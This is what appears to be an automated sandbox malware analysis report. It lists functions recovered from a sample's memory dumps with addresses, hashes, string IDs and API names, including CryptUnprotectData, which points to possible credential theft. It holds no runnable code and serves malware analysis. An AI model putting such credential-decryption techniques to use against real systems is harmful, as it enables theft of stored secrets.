                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: e88622c71dea04c3013e077b7b0f904e9333e2c630d604704681062b0a4e0f83
                                    • Instruction ID: be100bea0ac44c884f569a0802c893b57ba85206f2c16fcd04f90f3b819b4571
                                    • Opcode Fuzzy Hash: e88622c71dea04c3013e077b7b0f904e9333e2c630d604704681062b0a4e0f83
                                    • Instruction Fuzzy Hash: AC411874A00A289FDB24DB58CC95F9BB7B4BB49302F4081D8E618E72D0E7B16E85CF50
                                    Function 0019A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0019A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0019A2F3
                                    • LocalFree.KERNEL32(?), ref: 0019A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 1374bc98f951c2a328a77c9cd8c95784871ecbf84626d7979099149824d86a14
                                    • Instruction ID: aca848e3ee05e142a2a1cb6423ba6b8d459f08844804cbfb27319d29e3c0ac00
                                    • Opcode Fuzzy Hash: 1374bc98f951c2a328a77c9cd8c95784871ecbf84626d7979099149824d86a14
                                    • Instruction Fuzzy Hash: 8311FAB4A00209DFCB04DFA4D885AAEB7B5FF89300F108569ED1597350D770AE50CFA1
                                    Function 005F95BD Relevance: 4.1, Strings: 2, Instructions: 1629COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &A]~$Oa]
                                    • API String ID: 0-722490193
                                    • Opcode ID: 2b651e6f8fdccf149fe7efcce04b62beb24423fbdbf5bb81d2379c2e49bdbddf
                                    • Instruction ID: 7d253c475dcca388679f68e66206c4b18de1c3b972ee7f66ef3000c7bda5a70d
                                    • Opcode Fuzzy Hash: 2b651e6f8fdccf149fe7efcce04b62beb24423fbdbf5bb81d2379c2e49bdbddf
                                    • Instruction Fuzzy Hash: B3B229F390C2049FE304AE2DEC8567ABBE5EF94320F1A893DEAC4C7744E67558058796
                                    Function 00204BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: 12f8cad5d1c8923e94fc584ca3e6f7e86530fc0b674da1f70c5f84d4a2a6fcfe
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 2A7223B2928B218BD714CF14C88076FBBE2AFD9310F698A1DF9955B2D2D3709C519F81
                                    Function 005EF6D4 Relevance: 2.8, Strings: 1, Instructions: 1580COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: So
                                    • API String ID: 0-3171976996
                                    • Opcode ID: 8387f1f6e5928bb4a253a3b899e5b78e84ce7e7b5bd1322db6526a77912f31b1
                                    • Instruction ID: 3f7a6911530473cb628b4d481d18bd4b0c0721ef50ba6cc01c8f842d0ea182c5
                                    • Opcode Fuzzy Hash: 8387f1f6e5928bb4a253a3b899e5b78e84ce7e7b5bd1322db6526a77912f31b1
                                    • Instruction Fuzzy Hash: 4CB2FAF350C6049FE3046E2DEC85A7ABBE9EF94320F1A493DEAC5C7344EA3558418697
                                    Function 005E546F Relevance: 2.8, Strings: 1, Instructions: 1579COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +|j
                                    • API String ID: 0-833230539
                                    • Opcode ID: 2e61de2d6552ba8a15be0e94968ed47a9ae082da15866e35b19a64e7d85cc3f0
                                    • Instruction ID: 085463dd99226fb73148dc2e717b2b677817ab5bbbce26aa8170779ed346dfe7
                                    • Opcode Fuzzy Hash: 2e61de2d6552ba8a15be0e94968ed47a9ae082da15866e35b19a64e7d85cc3f0
                                    • Instruction Fuzzy Hash: 83B227F3A0C2049FE3046E2DEC8577ABBE5EB94720F1A463DEAC4C3744E63598158697
                                    Function 001E5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 09b6a47328d324d4a621b40f0a1fa0d040dc782b27e956405eddb494fdada6de
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: 83A246B1C00AA88BEF18CB56C8603FDB7B1FF65380F9842AAD55677281D3755E81CB50
                                    Function 001E4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: ede620ac9b5312d393039fc6fd828cbecb3eef650c7d53554f6fe3dc1ace890d
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: C0E1F131A08B819FC725CF29C8907AEB7E2EFC9304F554A2DF5D99B291D7319845CB82
                                    Function 001E4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction ID: 2c67a3c96637d77bac27132b56d9aec6e7b28ee04b47f1c22655c6212c07925a
                                    • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction Fuzzy Hash: A1E1D431A087419FDB24CE19C8917AEB7E6EFC9310F15892DE89A9B351D730EC45CB46
                                    Function 001FE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: UNC\
                                    • API String ID: 0-505053535
                                    • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction ID: e00d390eb734d2f20c1ea2555b917bdf08f35bb78e5a7227ff8e54bfa3f659fa
                                    • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction Fuzzy Hash: 14E14C71D0426D8EEF14CF18C8843BEBFF2AB85314F198169D6A49B2B2D7758D46CB90
                                    Function 004B340E Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2wZ_
                                    • API String ID: 0-2438490200
                                    • Opcode ID: f763feab7134c5439da24dd87cba9801dd79b9057393e636a90b9b15312fbdaa
                                    • Instruction ID: 03ced4d197b414c774dfd941dfab201725fa23d37ee1965077793b9ba76825a3
                                    • Opcode Fuzzy Hash: f763feab7134c5439da24dd87cba9801dd79b9057393e636a90b9b15312fbdaa
                                    • Instruction Fuzzy Hash: 745136F3E142245BE3045A29DC443A7B7DADB90320F2B413DEA88A7BC4E87A5C0147D5
                                    Function 005951F2 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
